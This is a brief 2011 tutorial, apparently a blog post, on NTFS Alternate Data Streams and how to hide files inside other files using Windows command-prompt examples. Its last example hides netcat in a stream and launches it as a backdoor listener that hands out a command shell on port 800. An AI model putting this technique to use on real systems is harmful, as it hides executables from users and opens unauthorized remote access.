December 9, 2011

ALTERNATE DATA STREAMS, or how to hide a file inside another file

We start with what they are and how they work. Essentially, "Alternate Data Streams" (ADS) are files within another file. You can think of a file as an ordered sequence of bytes accessed by a name. In NTFS (New Technology File System), this is the data stream you get when you open the file normally. However, NTFS can also store alternate streams alongside the main data, each identified by its own name.
Now let's do a simple test. To begin, open a command prompt and run the following commands:

echo text1 > file.txt
echo text2 > final.txt
(Creates 2 files with the given text)

type final.txt > file.txt:final.txt
(The file file.txt now contains the file final.txt)

more < file.txt:final.txt
(We see the contents of final.txt)


In another example, we run an executable file:

type notepad.exe > file.txt:notes.exe
start .\file.txt:notes.exe
(These commands execute it)

And with a little imagination, we can use other programs for other purposes:

type nc.exe > file.txt:backdoor.exe
start .\file.txt:backdoor.exe -d -L -p 800 -t -e cmd.exe
In this last example, we run the netcat program (discussed below) with several of its parameters to create a back door; entering through this door opens a command window.
Finally, note that in recent versions of Windows execution no longer works, but hiding files this way still does. You can also attach a stream to a directory, since this works not only with files.
